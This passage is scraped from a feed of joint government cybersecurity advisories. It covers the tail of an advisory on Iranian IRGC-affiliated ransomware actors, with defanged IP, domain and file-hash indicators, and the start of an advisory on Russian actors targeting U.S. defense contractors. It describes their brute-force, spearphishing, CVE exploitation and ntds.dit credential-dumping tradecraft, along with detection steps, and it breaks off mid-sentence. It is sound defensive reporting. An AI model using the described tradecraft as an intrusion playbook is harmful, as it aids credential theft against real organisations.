CISA\u2019s 24/7 Operations Center at [report@cisa.gov](<mailto:report@cisa.gov>) or (888) 282-0870, or the U.S. Secret Service (USSS) at a [USSS Field Office](<http://www.secretservice.gov/contact/field-offices/>).\n * **Australian organizations**: Visit [cyber.gov.au](<https://www.cyber.gov.au/>) or call 1300 292 371 (1300 CYBER 1) to report cybersecurity incidents and access alerts and advisories.\n * **Canadian organizations**: Report incidents by emailing CCCS at [contact@cyber.gc.ca](<mailto:contact@cyber.gc.ca>).\n * **United Kingdom organizations**: Report a significant cyber security incident: [ncsc.gov.uk/report-an-incident](<https://report.ncsc.gov.uk/>) (monitored 24 hours)\n * Apply incident response best practices found in the joint Cybersecurity Advisory, [Technical Approaches to Uncovering and Remediating Malicious Activity](<https://us-cert.cisa.gov/ncas/alerts/aa20-245a>), developed by CISA and the cybersecurity authorities of Australia, Canada, New Zealand, and the United Kingdom.\n\n**Note**: The authoring agencies strongly discourage paying ransoms as doing so does not guarantee files and records will be recovered and may pose sanctions risks.\n\n### **RESOURCES**\n\n * The U.S. Department of State\u2019s Rewards for Justice (RFJ) program offers a reward of up to $10 million for reports of foreign government malicious activity against U.S. critical infrastructure. See the [RFJ](<https://rewardsforjustice.net/english>) website for more information and how to report information securely.\n * For more information on malicious cyber activity affiliated with the Iranian government- sponsored malicious cyber activity, see [us-cert.cisa.gov/Iran](<https://www.us-cert.cisa.gov/iran>) and FBI\u2019s [Iran Threat](<https://www.fbi.gov/investigate/counterintelligence/the-iran-threat>) page.\n * For information and resources on protecting against and responding to ransomware or extortion activity, refer to [StopRansomware.gov](<https://www.cisa.gov/stopransomware/>), the U.S. centralized, whole-of-government webpage providing ransomware resources and alerts.\n * The joint advisory from the cybersecurity authorities of Australia, Canada, New Zealand, the United Kingdom, and the United States: [Technical Approaches to Uncovering and Remediating Malicious Activity](<https://us-cert.cisa.gov/sites/default/files/publications/AA20-245A-Joint_CSA-Technical_Approaches_to_Uncovering_Malicious_Activity_508.pdf>) provides additional guidance when hunting or investigating a network and common mistakes to avoid in incident handling.\n * CISA offers a range of no-cost [cyber hygiene services](<https://www.cisa.gov/cyber-hygiene-services>) to help critical infrastructure organizations assess, identify, and reduce their exposure to threats. By requesting these services, organizations of any size could find ways to reduce their risk and mitigate malicious activity.\n * ACSC can provide tailored cyber security advice and assistance, reporting, and incident response support at [cyber.gov.au](<https://www.cyber.gov.au/>) and via 1300 292 371 (1300 CYBER1).\n\n### **PURPOSE**\n\nThis advisory was developed by U.S., Australian, Canadian, and UK cybersecurity authorities in furtherance of their respective cybersecurity missions, including their responsibilities to develop and issue cybersecurity specifications and mitigations.\n\n### **DISCLAIMER**\n\nThe information in this report is being provided \u201cas is\u201d for informational purposes only. FBI, CISA, NSA, USCC-CNMF, DoT, ACSC, CCCS, and NCSC do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring.\n\n### **APPENDIX A: INDICATORS OF COMPROMISE**\n\nIP addresses and executables files are listed below. For a downloadable copy of IOCs, see [AA22- 257A.stix](<https://www.us-cert.gov/sites/default/files/AA22-257A.stix.xml>).\n\n#### **IP Addresses**\n\n * 54.39.78[.]148\n * 95.217.193[.]86\n * 104.168.117[.]149\n * 107.173.231[.]114\n * 144.76.186[.]88\n * 148.251.71[.]182\n * 172.245.26[.]118\n * 185.141.212[.]131\n * 198.12.65[.]175\n * 198.144.189[.]74\n\nNote: Some of these observed IP addresses may be outdated. The authoring agencies recommend organizations investigate or vet these IP addresses prior to taking action, such as blocking.\n\n#### **Malicious Domains**\n\n * newdesk[.]top\n * symantecserver[.]co\n * msupdate[.]us\n * msupdate[.]top\n * gupdate[.]us\n * aptmirror[.]eu\n * buylap[.]top\n * winstore[.]us\n * tcp443[.]org\n * mssync[.]one\n * upmirror[.]top\n * tcp443 (subdomain)\n * kcp53 (subdomain)\n\n#### **Files**\n\nMalicious files observed in this activity are identified in Table 1. Many of the below malicious files are masquerading as legitimate Windows files; therefore, file names alone should not be treated as an indicator of compromise. Note: For additional malicious files observed, see joint CSA [Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities](<https://www.cisa.gov/uscert/ncas/alerts/aa21-321a>).\n\nFilename:\n\n| \n\nWininet[.]xml \n \n---|--- \n \nPath:\n\n| \n\nC:\\Windows\\Temp\\wininet[.]xml \n \nMD5:\n\n| \n\nd2f4647a3749d30a35d5a8faff41765e \n \nSHA-1:\n\n| \n\n0f676bc786db3c44cac4d2d22070fb514b4cb64c \n \nSHA-256:\n\n| \n\n559d4abe3a6f6c93fc9eae24672a49781af140c43d491a757c8e975507b4032e \n \nFilename:\n\n| \n\nWininet\u2019[.]xml \n \nMD5:\n\n| \n\n2e1e17a443dc713f13f45a9646fc2179 \n \nSHA-1:\n\n| \n\ne75bfc0dd779d9d8ac02798b090989c2f95850dc \n \nFilename:\n\n| \n\nWinLogon[.]xml \n \nPath:\n\n| \n\nC:\\Windows\\Temp\\WinLogon[.]xml \n \nMD5:\n\n| \n\n49c71178fa212012d710f11a0e6d1a30 \n \nSHA-1:\n\n| \n\n226f0fbb80f7a061947c982ccf33ad65ac03280f \n \nSHA-256:\n\n| \n\nbcc2e4d96e7418a85509382df6609ec9a53b3805effb7ddaed093bdaf949b6ea \n \nFilename:\n\n| \n\nWininet[.]bat \n \nPath:\n\n| \n\nC:\\Windows\\wininet[.]bat \n \nMD5:\n\n| \n\n5f098b55f94f5a448ca28904a57c0e58 \n \nSHA-1:\n\n| \n\n27102b416ef5df186bd8b35190c2a4cc4e2fbf37 \n \nSHA-256:\n\n| \n\n668ec78916bab79e707dc99fdecfa10f3c87ee36d4dee6e3502d1f5663a428a0 \n \nFilename:\n\n| \n\nWinlogon[.]bat \n \nPath:\n\n| \n\nC:\\Windows\\winlogon[.]bat \n \nMD5:\n\n| \n\n7ac4633bf064ebba9666581b776c548f \n \nSHA-1:\n\n| \n\n524443dd226173d8ba458133b0a4084a172393ef \n \nSHA-256:\n\n| \n\nd14d546070afda086a1c7166eaafd9347a15a32e6be6d5d029064bfa9ecdede7 \n \nFilename:\n\n| \n\nCacheTask[.]bat \n \nPath:\n\n| \n\nC:\\\\\\ProgramData\\Microsoft\\CacheTask[.]bat \n \nMD5:\n\n| \n\nee8fd6c565254fe55a104e67cf33eaea \n \nSHA-1:\n\n| \n\n24ed561a1ddbecd170acf1797723e5d3c51c2f5d \n \nSHA-256:\n\n| \n\nc1723fcad56a7f18562d14ff7a1f030191ad61cd4c44ea2b04ad57a7eb5e2837 \n \nFilename:\n\n| \n\nTask_update[.]exe \n \n---|--- \n \nPath:\n\n| \n\nC:\\Windows\\Temp\\task_update[.]exe \n \nMD5:\n\n| \n\ncacb64bdf648444e66c82f5ce61caf4b \n \nSHA-1:\n\n| \n\n3a6431169073d61748829c31a9da29123dd61da8 \n \nSHA-256:\n\n| \n\n12c6da07da24edba13650cd324b2ad04d0a0526bb4e853dee03c094075ff6d1a \n \nFilename:\n\n| \n\nTask[.]exe \n \nMD5:\n\n| \n\n5b646edb1deb6396082b214a1d93691b \n \nSHA-1:\n\n| \n\n763ca462b2e9821697e63aa48a1734b10d3765ee \n \nSHA-256:\n\n| \n\n17e95ecc7fedcf03c4a5e97317cfac166b337288562db0095ccd24243a93592f \n \nFilename:\n\n| \n\ndllhost[.]exe \n \nPath:\n\n| \n\nC:\\Windows\\dllhost[.]exe \n \nMD5:\n\n| \n\n0f8b592126cc2be0e9967d21c40806bc\n\n| \n\n9a3703f9c532ae2ec3025840fa449d4e \n \nSHA-1:\n\n| \n\n3da45558d8098eb41ed7db5115af5a2c6 1c543af\n\n| \n\n8ece87086e8b5aba0d1cc4ec3804bf74e 0b45bee \n \nSHA-256:\n\n| \n\n724d54971c0bba8ff32aeb6044d3b3fd57 1b13a4c19cada015ea4bcab30cae26\n\n| \n\n1604e69d17c0f26182a3e3ff65694a4945\n\n0aafd56a7e8b21697a932409dfd81e \n \nFilename:\n\n| \n\nsvchost[.]exe \n \nPath:\n\n| \n\nC:\\Windows\\svchost[.]exe \n \nMD5:\n\n| \n\n68f58e442fba50b02130eedfc5fe4e5b\n\n| \n\n298d41f01009c6d6240bc2dc7b769205 \n \nSHA-1:\n\n| \n\n76dd6560782b13af3f44286483e157848\n\nefc0a4e\n\n| \n\n6ca62f4244994b5fbb8a46bdfe62aa1c95 8cebbd \n \nSHA-256:\n\n| \n\nb04b97e7431925097b3ca4841b894139 7b0b88796da512986327ff66426544ca\n\n| \n\n8aa3530540ba023fb29550643beb00c9c 29f81780056e02c5a0d02a1797b9cd9 \n \nFilename:\n\n| \n\nUser[.]exe \n \nPath:\n\n| \n\nC:\\Windows\\Temp\\user[.]exe \n \nMD5:\n\n| \n\nbd131ebfc44025a708575587afeebbf3\n\n| \n\nf0be699c8aafc41b25a8fc0974cc4582 \n \nSHA-1:\n\n| \n\n8b23b14d8ec4712734a5f6261aed40942 c9e0f68\n\n| \n\n6bae2d45bbd8c4b0a59ba08892692fe86 e596154 \n \nSHA-256:\n\n| \n\nb8a472f219658a28556bab4d6d109fdf3 433b5233a765084c70214c973becbbd\n\n| \n\n7b5fbbd90eab5bee6f3c25aa3c2762104 e219f96501ad6a4463e25e6001eb00b \n \nFilename:\n\n| \n\nSetup[.]bat \n \n---|--- \n \nPath:\n\n| \n\nC:\\Users\\DefaultAccount\\Desktop\\New folder\\setup[.]bat \n \nMD5:\n\n| \n\n7fdc2d007ef0c1946f1f637b87f81590 \n \nFilename:\n\n| \n\nSsasl[.]pmd \n \nPath:\n\n| \n\nC:\\Windows\\Temp\\ssasl[.]pmd \n \nFilename:\n\n| \n\nSsasl[.]zip \n \nPath:\n\n| \n\nC:\\Windows\\Temp\\ssasl[.]zip \n \nFilename:\n\n| \n\nnetscanold[.]exe \n \nPath:\n\n| \n\nC:\\Users\\DefaultAccount\\Desktop\\netscanold\\netscanold[.]exe \n \nFilename:\n\n| \n\nscan[.]csv \n \nPath:\n\n| \n\nC:\\Users\\DefaultAccount\\Desktop\\scan[.]csv \n \nFilename:\n\n| \n\nlsass[.]dmp \n \nPath:\n\n| \n\nC:\\Users\\DefaultAccount\\AppData\\Local\\Temp\\lsass[.]dmp \n \nFilename:\n\n| \n\nlsass[.]zip \n \nPath:\n\n| \n\nC:\\Users\\DefaultAccount\\AppData\\Local\\Temp\\lsass[.]zip \n \n** **\n\n### **APPENDIX B: MITRE ATT&amp;CK TACTICS AND TECHNIQUES**\n\nTable 2 identifies MITRE ATT&amp;CK Tactics and techniques observed in this activity.\n\n_Table 2: Observed Tactics and Techniques_\n\nTactic\n\n| \n\nTechnique \n \n---|--- \n \nResource Development []TA0042](<https://attack.mitre.org/versions/v11/tactics/TA0042>)]\n\n| \n\nObtain Capabilities: Malware [[T1588.001](<https://attack.mitre.org/versions/v11/techniques/T1588/001>)] \n \nObtain Capabilities: Tool [[T1588.002](<https://attack.mitre.org/versions/v11/techniques/T1588/002>)] \n \nInitial Access [[TA0001](<https://attack.mitre.org/versions/v11/tactics/TA0001/>)]\n\n| \n\nExploit Public-Facing Application [[T1190](<https://attack.mitre.org/versions/v11/techniques/T1190/>)] \n \nExecution [[TA0002](<https://attack.mitre.org/versions/v11/tactics/TA0002>)]\n\n| \n\nScheduled Task/Job: Scheduled Task [[T1053.005](<https://attack.mitre.org/versions/v11/techniques/T1053/005>)] \n \nPersistence [[TA0003](<https://attack.mitre.org/versions/v11/tactics/TA0003>)]\n\n| \n\nCreate Account: Local Account [[T1136.001](<https://attack.mitre.org/versions/v10/techniques/T1136/001>)] \n \nCreate Account: Domain Account [[T1136.002](<https://attack.mitre.org/versions/v11/techniques/T1136/002>)] \n \nPrivilege Escalation [[TA0004](<https://attack.mitre.org/versions/v11/tactics/TA0004>)]\n\n| \n \nCredential Access [[TA0006](<https://attack.mitre.org/versions/v11/tactics/TA0006>)]\n\n| \n \nCollection [[TA0009](<https://attack.mitre.org/versions/v11/tactics/TA0009>)]\n\n| \n\nArchive Collected Data: Archive via Utility [[T1560.001](<https://attack.mitre.org/versions/v11/techniques/T1560/001>)] \n \nExfiltration [[TA0010](<https://attack.mitre.org/versions/v11/tactics/TA0010/>)]\n\n| \n \nImpact [[TA0040](<https://attack.mitre.org/versions/v11/tactics/TA0040>)]\n\n| \n\nData Encrypted for Impact [[T1486](<https://attack.mitre.org/versions/v11/techniques/T1486>)] \n \n### Revisions\n\nSeptember 14, 2022: Initial Version\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-09-14T12:00:00", "type": "ics", "title": "Iranian Islamic Revolutionary Guard Corps-Affiliated Cyber Actors Exploiting Vulnerabilities for Data Extortion and Disk Encryption for Ransom Operations", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-5591", "CVE-2020-12812", "CVE-2021-31196", "CVE-2021-31206", "CVE-2021-31207", "CVE-2021-33766", "CVE-2021-33768", "CVE-2021-34470", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105", "CVE-2023-26360"], "modified": "2022-09-14T12:00:00", "id": "AA22-257A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-257a", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-06T15:49:48", "description": "### Summary\n\n_Actions to Help Protect Against Russian State-Sponsored Malicious Cyber Activity:_ \n\u2022 Enforce multifactor authentication. \n\u2022 Enforce strong, unique passwords. \n\u2022 Enable M365** **Unified Audit Logs. \n\u2022 Implement** **endpoint detection and response tools.\n\nFrom at least January 2020, through February 2022, the Federal Bureau of Investigation (FBI), National Security Agency (NSA), and Cybersecurity and Infrastructure Security Agency (CISA) have observed regular targeting of U.S. cleared defense contractors (CDCs) by Russian state-sponsored cyber actors. The actors have targeted both large and small CDCs and subcontractors with varying levels of cybersecurity protocols and resources. These CDCs support contracts for the U.S. Department of Defense (DoD) and Intelligence Community in the following areas:\n\n * Command, control, communications, and combat systems;\n * Intelligence, surveillance, reconnaissance, and targeting;\n * Weapons and missile development;\n * Vehicle and aircraft design; and\n * Software development, data analytics, computers, and logistics. \n\nHistorically, Russian state-sponsored cyber actors have used common but effective tactics to gain access to target networks, including spearphishing, credential harvesting, brute force/password spray techniques, and known vulnerability exploitation against accounts and networks with weak security. These actors take advantage of simple passwords, unpatched systems, and unsuspecting employees to gain initial access before moving laterally through the network to establish persistence and exfiltrate data. \n\nIn many attempted compromises, these actors have employed similar tactics to gain access to enterprise and cloud networks, prioritizing their efforts against the widely used Microsoft 365 (M365) environment. The actors often maintain persistence by using legitimate credentials and a variety of malware when exfiltrating emails and data.\n\nThese continued intrusions have enabled the actors to acquire sensitive, unclassified information, as well as CDC-proprietary and export-controlled technology. The acquired information provides significant insight into U.S. weapons platforms development and deployment timelines, vehicle specifications, and plans for communications infrastructure and information technology. By acquiring proprietary internal documents and email communications, adversaries may be able to adjust their own military plans and priorities, hasten technological development efforts, inform foreign policymakers of U.S. intentions, and target potential sources for recruitment. Given the sensitivity of information widely available on unclassified CDC networks, the FBI, NSA, and CISA anticipate that Russian state-sponsored cyber actors will continue to target CDCs for U.S. defense information in the near future. These agencies encourage all CDCs to apply the recommended mitigations in this advisory, regardless of evidence of compromise.\n\nFor additional information on Russian state-sponsored cyber activity, see CISA's webpage, [Russia Cyber Threat Overview and Advisories](<https://www.us-cert.cisa.gov/russia>).\n\nClick here for a PDF version of this report.\n\n### Threat Details\n\n#### **Targeted Industries and Assessed Motive**\n\nRussian state-sponsored cyber actors have targeted U.S. CDCs from at least January 2020, through February 2022. The actors leverage access to CDC networks to obtain sensitive data about U.S. defense and intelligence programs and capabilities. Compromised entities have included CDCs supporting the U.S. Army, U.S. Air Force, U.S. Navy, U.S. Space Force, and DoD and Intelligence programs.\n\nDuring this two-year period, these actors have maintained persistent access to multiple CDC networks, in some cases for at least six months. In instances when the actors have successfully obtained access, the FBI, NSA, and CISA have noted regular and recurring exfiltration of emails and data. For example, during a compromise in 2021, threat actors exfiltrated hundreds of documents related to the company\u2019s products, relationships with other countries, and internal personnel and legal matters.\n\nThrough these intrusions, the threat actors have acquired unclassified CDC-proprietary and export-controlled information. This theft has granted the actors significant insight into U.S. weapons platforms development and deployment timelines, plans for communications infrastructure, and specific technologies employed by the U.S. government and military. Although many contract awards and descriptions are publicly accessible, program developments and internal company communications remain sensitive. Unclassified emails among employees or with government customers often contain proprietary details about technological and scientific research, in addition to program updates and funding statuses. See figures 1 and 2 for information on targeted customers, industries, and information.\n\n\n\n_Figure 1. Targeted Industries_\n\n\n\n_Figure 2. Exfiltrated Information_\n\n#### \n\n#### **Threat Actor Activity**\n\n_**Note:** This advisory uses the MITRE ATT&amp;CK\u00ae for Enterprise framework, version 10. See the [ATT&amp;CK for Enterprise](<https://attack.mitre.org/versions/v10/techniques/enterprise/>) for all referenced threat actor tactics and techniques. See the Tactics, Techniques, and Procedures (TTPs) section for a table of the threat actors\u2019 activity mapped to MITRE ATT&amp;CK tactics and techniques._\n\n##### _**Initial Access **_\n\nRussian state-sponsored cyber actors use brute force methods, spearphishing, harvested credentials, and known vulnerabilities to gain initial access to CDC networks.\n\n * Threat actors use brute force techniques [[T1110](<https://attack.mitre.org/versions/v10/techniques/T1110>)] to identify valid account credentials [[T1589.001](<https://attack.mitre.org/versions/v10/techniques/T1589/001/>)] for domain and M365 accounts. After obtaining domain credentials, the actors use them to gain initial access to the networks. _**Note:** For more information, see joint NSA-FBI-CISA Cybersecurity Advisory: [Russian GRU Conducting Global Brute Force Campaign to Compromise Enterprise and Cloud Environments](<https://media.defense.gov/2021/Jul/01/2002753896/-1/-1/1/CSA_GRU_GLOBAL_BRUTE_FORCE_CAMPAIGN_UOO158036-21.PDF>)._\n * Threat actors send spearphishing emails with links to malicious domains [[T1566.002](<https://attack.mitre.org/versions/v10/techniques/T1566/002>)] and use publicly available URL shortening services to mask the link [[T1027](<https://attack.mitre.org/versions/v10/techniques/T1027>)]. Embedding shortened URLs instead of actor-controlled malicious domains is an obfuscation technique meant to bypass virus and spam scanning tools. The technique often promotes a false legitimacy to the email recipient, increasing the probability of a victim\u2019s clicking on the link. \n * The threat actors use harvested credentials in conjunction with known vulnerabilities\u2014for example, CVE-2020-0688 and CVE-2020-17144\u2014on public-facing applications [[T1078](<https://attack.mitre.org/versions/v10/techniques/T1078/>), [T1190](<https://attack.mitre.org/versions/v10/techniques/T1190/>)], such as virtual private networks (VPNs), to escalate privileges and gain remote code execution (RCE) on the exposed applications.[[1](<https://media.defense.gov/2021/Jul/01/2002753896/-1/-1/1/CSA_GRU_GLOBAL_BRUTE_FORCE_CAMPAIGN_UOO158036-21.PDF>)] In addition, threat actors have exploited CVE-2018-13379 on FortiClient to obtain credentials to access networks. \n * As CDCs find and patch known vulnerabilities on their networks, the actors alter their tradecraft to seek new means of access. This activity necessitates CDCs maintain constant vigilance for software vulnerabilities and out-of-date security configurations, especially in internet-facing systems.\n\n##### _**Credential Access** _\n\nAfter gaining access to networks, the threat actors map the Active Directory (AD) and connect to domain controllers, from which they exfiltrate credentials and export copies of the AD database `ntds.dit` [[T1003.003](<https://attack.mitre.org/versions/v10/techniques/T1003/003/>)]. In multiple instances, the threat actors have used Mimikatz to dump admin credentials from the domain controllers. \n\n##### _**Collection**_\n\nUsing compromised M365 credentials, including global admin accounts, the threat actors can gain access to M365 resources, including SharePoint pages [[T1213.002](<https://attack.mitre.org/versions/v10/techniques/T1213/002/>)], user profiles, and user emails [[T1114.002](<https://attack.mitre.org/versions/v10/techniques/T1114/002/>)].\n\n##### _**Command and Control**_\n\nThe threat actors routinely use virtual private servers (VPSs) as an encrypted proxy. The actors use VPSs, as well as small office and home office (SOHO) devices, as operational nodes to evade detection [[T1090.003](<https://attack.mitre.org/versions/v10/techniques/T1090/003/>)].\n\n##### _**Persistence**_\n\nIn multiple instances, the threat actors maintained persistent access for at least six months. Although the actors have used a variety of malware to maintain persistence, the FBI, NSA, and CISA have also observed intrusions that did not rely on malware or other persistence mechanisms. In these cases, it is likely the threat actors relied on possession of legitimate credentials for persistence [[T1078](<https://attack.mitre.org/versions/v10/techniques/T1078/>)], enabling them to pivot to other accounts, as needed, to maintain access to the compromised environments.\n\n#### **Tactics, Techniques, and Procedures**\n\nThe following table maps observed Russian state-sponsored cyber activity to the MITRE ATT&amp;CK for Enterprise framework. Several of the techniques listed in the table are based on observed procedures in contextual order. Therefore, some of the tactics and techniques listed in their respective columns appear more than once. See Appendix A for a functional breakdown of TTPs. _**Note:** for specific countermeasures related to each ATT&amp;CK technique, see the [Enterprise Mitigations](<https://attack.mitre.org/mitigations/>) section and [MITRE D3FEND](<https://d3fend.mitre.org/>)_\u2122. \n\n\n_Table 1: Observed Tactics, Techniques, and Procedures (TTPs)_\n\nTactic | Technique | Procedure \n---|---|--- \n \n**Reconnaissance [[TA0043](<https://attack.mitre.org/versions/v10/tactics/TA0043/>)]**\n\n**Credential Access [[TA0006](<https://attack.mitre.org/versions/v10/tactics/TA0006/>)]**\n\n| \n\nGather Victim Identity Information: Credentials [[T1589.001](<https://attack.mitre.org/versions/v10/techniques/T1589/001/>)] \n\nBrute Force [[T1110](<https://attack.mitre.org/versions/v10/techniques/T1110/003/>)]\n\n| Threat actors used brute force to identify valid account credentials for domain and M365 accounts. After obtaining domain credentials, the actors used them to gain initial access. \n**Initial Access [[TA0001](<https://attack.mitre.org/versions/v10/tactics/TA0001/>)]** | External Remote Services [[T1133](<https://attack.mitre.org/versions/v10/techniques/T1133>)] | Threat actors continue to research vulnerabilities in Fortinet\u2019s FortiGate VPN devices, conducting brute force attacks and leveraging CVE-2018-13379 to gain credentials to access victim networks. [[2](<https://media.defense.gov/2019/Oct/07/2002191601/-1/-1/0/CSA-MITIGATING-RECENT-VPN-VULNERABILITIES.PDF>)] \n \n**Initial Access [[TA0001](<https://attack.mitre.org/versions/v10/tactics/TA0001/>)]**\n\n**Privilege Escalation [[TA0004](<https://attack.mitre.org/versions/v10/tactics/TA0004>)]**\n\n| \n\nValid Accounts [[T1078](<https://attack.mitre.org/versions/v10/techniques/T1078/>)]\n\nExploit Public-Facing Application [[T1190](<https://attack.mitre.org/versions/v10/techniques/T1190/>)]\n\n| Threat actors used credentials in conjunction with known vulnerabilities on public-facing applications, such as virtual private networks (VPNs)\u2014CVE-2020-0688 and CVE-2020-17144\u2014to escalate privileges and gain remote code execution (RCE) on the exposed applications. [[3](<https://media.defense.gov/2021/Jul/01/2002753896/-1/-1/1/CSA_GRU_GLOBAL_BRUTE_FORCE_CAMPAIGN_UOO158036-21.PDF>)] \n \n**Initial Access [[TA0001](<https://attack.mitre.org/versions/v10/tactics/TA0001/>)]**\n\n**Defense Evasion [[TA0005](<https://attack.mitre.org/versions/v10/tactics/TA0005>)]**\n\n| \n\nPhishing: Spearphishing Link [[T1566.002](<https://attack.mitre.org/versions/v10/techniques/T1566/002>)]\n\nObfuscated Files or Information [[T1027](<https://attack.mitre.org/versions/v10/techniques/T1027>)]\n\n| Threat actors sent spearphishing emails using publicly available URL shortening services. Embedding shortened URLs instead of the actor-controlled malicious domain is an obfuscation technique meant to bypass virus and spam scanning tools. The technique often promotes a false legitimacy to the email recipient and thereby increases the possibility that a victim clicks on the link. \n \n**Initial Access [[TA0001](<https://attack.mitre.org/versions/v10/tactics/TA0001/>)]**\n\n**Credential Access [[TA0006](<https://attack.mitre.org/versions/v10/tactics/TA0006/>)]**\n\n| \n\nOS Credential Dumping: NTDS [[T1003.003](<https://attack.mitre.org/versions/v10/techniques/T1003/003/>)]\n\nValid Accounts: Domain Accounts [[T1078.002](<https://attack.mitre.org/versions/v10/techniques/T1078/002/>)]\n\n| Threat actors logged into a victim\u2019s VPN server and connected to the domain controllers, from which they exfiltrated credentials and exported copies of the AD database `ntds.dit`. \n \n**Initial Access [[TA0001](<https://attack.mitre.org/versions/v10/tactics/TA0001/>)]**\n\n**Privilege Escalation [[TA0004](<https://attack.mitre.org/versions/v10/tactics/TA0004>)]**\n\n**Collection [[TA0009](<https://attack.mitre.org/versions/v10/tactics/TA0009/>)]**\n\n| \n\nValid Accounts: Cloud Accounts [[T1078.004](<https://attack.mitre.org/versions/v10/techniques/T1078/004/>)]\n\nData from Information Repositories: SharePoint [[T1213.002](<https://attack.mitre.org/versions/v9/techniques/T1213/002/>)]\n\n| In one case, the actors used valid credentials of a global admin account within the M365 tenant to log into the administrative portal and change permissions of an existing enterprise application to give read access to all SharePoint pages in the environment, as well as tenant user profiles and email inboxes. \n \n**Initial Access [[TA0001](<https://attack.mitre.org/versions/v10/tactics/TA0001/>)]**\n\n**Collection [[TA0009](<https://attack.mitre.org/versions/v10/tactics/TA0009/>)]**\n\n| \n\nValid Accounts: Domain Accounts [[T1078.002](<https://attack.mitre.org/versions/v10/techniques/T1078/002/>)]\n\nEmail Collection [[T1114](<https://attack.mitre.org/versions/v10/techniques/T1114>)]\n\n| In one case, the threat actors used legitimate credentials to exfiltrate emails from the victim's enterprise email system. \n \n**Persistence [[TA0003](<https://attack.mitre.org/versions/v10/tactics/TA0003/>)]**\n\n**Lateral Movement [[TA0008](<https://attack.mitre.org/versions/v10/tactics/TA0008>)]**\n\n| Valid Accounts [[T1078](<https://attack.mitre.org/versions/v10/techniques/T1078/>)] | Threat actors used valid accounts for persistence. After some victims reset passwords for individually compromised accounts, the actors pivoted to other accounts, as needed, to maintain access. \n**Discovery [[TA0007](<https://attack.mitre.org/tactics/TA0007>)]** | File and Network Discovery [[T1083](<https://attack.mitre.org/versions/v10/techniques/T1083>)] | After gaining access to networks, the threat actors used BloodHound to map the Active Directory. \n**Discovery [[TA0007](<https://attack.mitre.org/versions/v10/tactics/TA0007>)]** | Domain Trust Discovery [[T1482](<https://attack.mitre.org/versions/v10/techniques/T1482/>)] | Threat actors gathered information on domain trust relationships that were used to identify lateral movement opportunities. \n**Command and Control [[TA0011](<https://attack.mitre.org/versions/v10/tactics/TA0011/>)]** | Proxy: Multi-hop Proxy [[T1090.003](<https://attack.mitre.org/versions/v10/techniques/T1090/003/>)] | Threat actors used multiple disparate nodes, such as VPSs, to route traffic to the target. \n \n### \n\n### Detection\n\nThe FBI, NSA, and CISA urge all CDCs to investigate suspicious activity in their enterprise and cloud environments. _**Note:** for additional approaches on uncovering malicious cyber activity, see joint advisory [Technical Approaches to Uncovering and Remediating Malicious Activity](<https://us-cert.cisa.gov/sites/default/files/publications/AA20-245A-Joint_CSA-Technical_Approaches_to_Uncovering_Malicious_Activity_508.pdf>), authored by CISA and the cybersecurity authorities of Australia, Canada, New Zealand, and the United Kingdom._\n\n#### **Detect Unusual Activity**\n\n**Implement robust log collection and retention.** Robust logging is critical for detecting unusual activity. Without a centralized log collection and monitoring capability, organizations have limited ability to investigate incidents or detect the threat actor behavior described in this advisory. Depending on the environment, tools and solutions include:\n\n * Cloud native solutions, such as cloud-native security incident and event management (SIEM) tools.\n * Third-party tools, such as Sparrow, to review Microsoft cloud environments and to detect unusual activity, service principals, and application activity. _**Note:** for guidance on using these and other detection tools, refer to CISA Cybersecurity Advisory [Detecting Post-Compromise Threat Activity in Microsoft Cloud Environments](<https://us-cert.cisa.gov/ncas/alerts/aa21-008a>)._\n\n#### **Look for Evidence of Known TTPs**\n\n * **Look for behavioral evidence or network and host-based artifacts** from known TTPs associated with this activity. To detect password spray activity, review authentication logs for system and application login failures of valid accounts. Look for frequent, failed authentication attempts across multiple accounts. \n * To detect use of compromised credentials in combination with a VPS, follow the steps below: \n * **Review logs for suspicious \u201cimpossible logins,\u201d** such as logins with changing usernames, user agent strings, and IP address combinations or logins where IP addresses do not align to the expected user\u2019s geographic location.\n * **Look for one IP used for multiple accounts,** excluding expected logins.\n * **Search for \u201cimpossible travel,\u201d **which occurs when a user logs in from multiple IP addresses that are a significant geographic distance apart (i.e., a person could not realistically travel between the geographic locations of the two IP addresses in the time between logins). _**Note:** this detection opportunity can result in false positives if legitimate users apply VPN solutions before connecting to networks._\n * **Evaluate processes and program execution command-line arguments** that may indicate credential dumping, especially attempts to access or copy the `ntds.dit` file from a domain controller. \n * Identify suspicious privileged account use after resetting passwords or applying user account mitigations. \n * **Review logs for unusual activity** in typically dormant accounts.\n * **Look for unusual user agent strings,** such as strings not typically associated with normal user activity, which may indicate bot activity.\n\n### Incident Response and Remediation\n\nOrganizations with evidence of compromise should assume full identity compromise and initiate a full identity reset.\n\n * **Reset passwords for all local accounts. **These accounts should include Guest, HelpAssistant, DefaultAccount, System, Administrator, and krbtgt. It is essential to reset the password for the krbtgt account, as this account is responsible for handling Kerberos ticket requests as well as encrypting and signing them. _**Note:** reset the krbtgt account twice and consecutively with a 10-hour waiting period between resets (i.e., perform the first krbtgt password reset, 